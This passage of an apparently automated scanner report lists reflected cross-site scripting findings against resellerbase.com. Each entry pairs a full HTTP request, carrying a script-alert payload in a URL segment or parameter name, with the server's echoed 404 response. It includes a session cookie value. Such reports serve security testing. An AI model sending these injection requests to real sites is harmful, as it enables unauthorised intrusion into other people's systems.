Date: Wed, 17 Nov 2010 23:15:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images1c22e<script>alert(1)</script>6f82651162/rating/ was not found on this server.</p>
...[SNIP]...

2.2587. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload bd570<script>alert(1)</script>b0913e90074 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/ratingbd570<script>alert(1)</script>b0913e90074/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/ratingbd570<script>alert(1)</script>b0913e90074/ was not found on this server.</p>
...[SNIP]...

2.2588. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7e8ce<script>alert(1)</script>c8f7d3eba83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/rating/?7e8ce<script>alert(1)</script>c8f7d3eba83=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/?7e8ce<script>alert(1)</script>c8f7d3eba83=1 was not found on this server.</p>
...[SNIP]...

2.2589. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8770<script>alert(1)</script>4fcb4e8a784 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild8770<script>alert(1)</script>4fcb4e8a784/38/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild8770<script>alert(1)</script>4fcb4e8a784/38/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2590. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43a06<script>alert(1)</script>1a967185a30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3843a06<script>alert(1)</script>1a967185a30/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3843a06<script>alert(1)</script>1a967185a30/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2591. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0857<script>alert(1)</script>273ae194b4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themesb0857<script>alert(1)</script>273ae194b4c/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themesb0857<script>alert(1)</script>273ae194b4c/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2592. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8b1cc<script>alert(1)</script>8434eed3dd5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos8b1cc<script>alert(1)</script>8434eed3dd5/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos8b1cc<script>alert(1)</script>8434eed3dd5/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2593. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c1854<script>alert(1)</script>ceeb028280d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/imagesc1854<script>alert(1)</script>ceeb028280d/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/imagesc1854<script>alert(1)</script>ceeb028280d/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2594. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 55271<script>alert(1)</script>f1d21cf50f3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/rating55271<script>alert(1)</script>f1d21cf50f3/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating55271<script>alert(1)</script>f1d21cf50f3/0.gif was not found on this server.</p>
...[SNIP]...

2.2595. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload f5de0<script>alert(1)</script>5189009678a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/rating/0.giff5de0<script>alert(1)</script>5189009678a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/0.giff5de0<script>alert(1)</script>5189009678a was not found on this server.</p>
...[SNIP]...

2.2596. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 47707<script>alert(1)</script>38cad12fc6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/rating/0.gif?47707<script>alert(1)</script>38cad12fc6d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/0.gif?47707<script>alert(1)</script>38cad12fc6d=1 was not found on this server.</p>
...[SNIP]...

2.2597. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6ef3b<script>alert(1)</script>f621369958c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6ef3b<script>alert(1)</script>f621369958c/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6ef3b<script>alert(1)</script>f621369958c/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2598. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54c8f<script>alert(1)</script>bf93c9e3b82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3854c8f<script>alert(1)</script>bf93c9e3b82/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3854c8f<script>alert(1)</script>bf93c9e3b82/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2599. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 65b0f<script>alert(1)</script>5e2660d7080 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes65b0f<script>alert(1)</script>5e2660d7080/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes65b0f<script>alert(1)</script>5e2660d7080/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2600. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 723ff<script>alert(1)</script>fde72a4253 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos723ff<script>alert(1)</script>fde72a4253/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos723ff<script>alert(1)</script>fde72a4253/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2601. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload be69e<script>alert(1)</script>b5564eb1659 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/imagesbe69e<script>alert(1)</script>b5564eb1659/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/imagesbe69e<script>alert(1)</script>b5564eb1659/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2602. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6cd32<script>alert(1)</script>d1e6ca62f7f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/rating6cd32<script>alert(1)</script>d1e6ca62f7f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating6cd32<script>alert(1)</script>d1e6ca62f7f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2603. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 989f9<script>alert(1)</script>08f2356a29d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/rating/search.php989f9<script>alert(1)</script>08f2356a29d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/search.php989f9<script>alert(1)</script>08f2356a29d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2604. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7903d<a>a752bd2c4ca was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search7903d<a>a752bd2c4ca&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search7903d<a>a752bd2c4ca&opt=2 was not found on this server.</p>
...[SNIP]...

2.2605. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/search.php

